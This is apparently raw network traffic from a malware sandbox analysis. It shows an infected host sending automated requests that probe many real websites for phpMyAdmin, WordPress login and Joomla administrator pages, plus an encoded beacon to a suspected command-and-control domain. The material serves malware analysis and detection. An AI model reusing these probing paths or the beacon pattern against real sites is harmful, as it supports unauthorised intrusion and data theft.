                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: http://www.analvids.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                418192.168.2.66301745.60.74.5080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.262080908 CET185OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zuhauseplus.vodafone.de
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                419192.168.2.663168104.22.43.15880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265103102 CET174OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.597428083 CET445INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd49be49adcf-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.597462893 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                420192.168.2.66305613.248.169.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.275441885 CET172OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.604123116 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_JExPAaM+MSwpEncYEukSvrqhD0vGMBVI4Ybpsn40Ikc5finK/ZyaG0SMH6Wm+bTD4if8FqBmxLLMFd8tFhUbkA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                421192.168.2.66306731.216.144.580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.279109001 CET168OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.480349064 CET195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                422192.168.2.663045185.196.8.2280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.290751934 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.531451941 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                423192.168.2.662946202.81.112.3280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.304267883 CET195OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.627079010 CET369INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://testconnect.garena.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                424192.168.2.66306182.221.28.17180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.309834003 CET166OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.544230938 CET529INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=60
                                                                                                                                                                                                                                                                                                                                                                Location: https://uh.is/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                425192.168.2.663062163.247.44.23980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.319330931 CET186OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.562757015 CET123INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://mitextoescolar.mineduc.cl/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.017945051 CET185OUTGET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.262245893 CET122INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://mitextoescolar.mineduc.cl/phpMyAdmin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                426192.168.2.66317313.248.169.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.351217985 CET173OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.678003073 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HgGLa2ZqsCpCEK8zzb/jbfkVJQcEj7nNxsDThlwrEpzbE9yR2GhYIKzKBPjdoTl7Qia4M0KP1O5IVRwpqQqwcQ
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                427192.168.2.662965185.78.166.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.351281881 CET203OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.704467058 CET396INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                428192.168.2.663174185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.361924887 CET178OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.654576063 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=13974631a4e2457fd96fc7589cd3b576; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
